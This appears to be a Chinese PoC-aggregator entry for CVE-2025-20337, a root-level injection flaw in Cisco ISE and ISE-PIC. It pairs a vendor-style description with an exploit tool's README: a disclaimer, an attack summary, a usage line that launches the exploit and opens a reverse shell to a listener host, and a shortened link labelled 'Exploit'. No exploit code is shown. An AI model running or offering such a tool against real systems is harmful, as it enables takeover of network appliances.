关联漏洞
标题:
Cisco ISE和Cisco ISE-PIC 注入漏洞
(CVE-2025-20337)
描述:Cisco ISE和Cisco ISE-PIC都是美国思科(Cisco)公司的产品。Cisco ISE是一个 NAC 解决方案。用于管理零信任架构中的端点、用户和设备对网络资源的访问。Cisco ISE-PIC是一个组件。 Cisco ISE和Cisco ISE-PIC存在注入漏洞,该漏洞源于用户输入验证不足,可能导致未经验证的远程攻击者以root权限执行任意代码。
介绍
# CVE-2025-20337
## DISCLAIMER
> This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any misuse of this tool. Unauthorized testing of systems without explicit permission is illegal and strictly prohibited. By using this tool, you agree to use it only on systems for which you have obtained prior written permission. Any actions and or activities related to the material contained within this repository are solely your responsibility.
## Description:
The attacker can compromise any unpatched Cisco ISE or ISE-PIC device by sending a malicious API request over the network.
No authentication or user interaction is required. By exploiting a deserialization flaw in the monitoring API, attackers gain root access to the underlying operating system. This vulnerability turns network security appliances into attack launchpads, enabling total infrastructure takeover.
### Usage
```bash
./exploit.sh -t 10.0.55.10 -l 192.168.1.100 -p 4444
# Options:
# -t Target IP address
# -l Listener IP for reverse shell
# -p Listener port
# -c Custom command (optional)
```
Exploit:
[**href**](https://tinyurl.com/2cj5v6ze)
文件快照
[4.0K] /data/pocs/47a8415f7af5f29f65515b74a566934a95c87bae
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。